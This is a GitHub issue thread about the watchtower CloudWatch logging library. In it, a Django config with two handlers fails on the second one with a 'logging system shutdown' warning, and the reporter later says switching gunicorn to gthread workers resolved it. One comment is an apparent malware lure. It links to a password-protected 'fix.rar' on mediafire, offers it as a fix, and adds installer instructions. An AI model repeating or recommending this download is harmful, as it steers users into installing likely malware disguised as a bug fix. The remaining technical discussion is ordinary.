### ISSUE TITLE
Only 1 watchtower handler works; others fail when logging with "WatchtowerWarning: Received message after logging system shutdown"

### ISSUE THREAD

**Issue by ebk46** [kislyuk/watchtower#206]
We are using Django 4.2.15 and Watchtower 3.3.1

We have logging via Watchtower for 2 different CloudWatch streams within the same group. The following is environment-specific settings code within <env>-settings.py files. They share a common initial `LOGGING` config.

```
boto3_logs_client = boto3.client("logs", region_name=AWS_REGION)

LOGGING["handlers"]["primary"] = {
  "class": "watchtower.CloudWatchLogHandler",
  "level": "DEBUG",
  "boto3_client": boto3_logs_client,
  "log_stream_name": "primary",
  "formatter": "aws",
}

LOGGING["loggers"]["primary"] = {
  "handlers": ["primary"],
  "level": "DEBUG",
}

LOGGING["handlers"]["secondary"] = {
  "class": "watchtower.CloudWatchLogHandler",
  "level": "DEBUG",
  "boto3_client": boto3_logs_client,
  "log_stream_name": "secondary",
  "formatter": "aws",
}

LOGGING["loggers"]["secondary"] = {
  "handlers": ["secondary"],
  "level": "DEBUG",
}
```

The "primary" logger works as intended. However, any logs to the "secondary" logger fail with: 
```
WatchtowerWarning: Received message after logging system shutdown
```

As with many issues in this repo, setting `use_queues: False` enables logs for both, but that is not suitable for a production deployment.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ebk46** [comment]
It seems that switching our gunicorn worker class from the default ("sync") to "gthread" and using multiple threads per worker somehow resolved this. I'm not sure exactly how, but I'll close this issue since it seems to not be directly related to watchtower. With that said, if that's true, it would probably be a helpful addition to the docs.
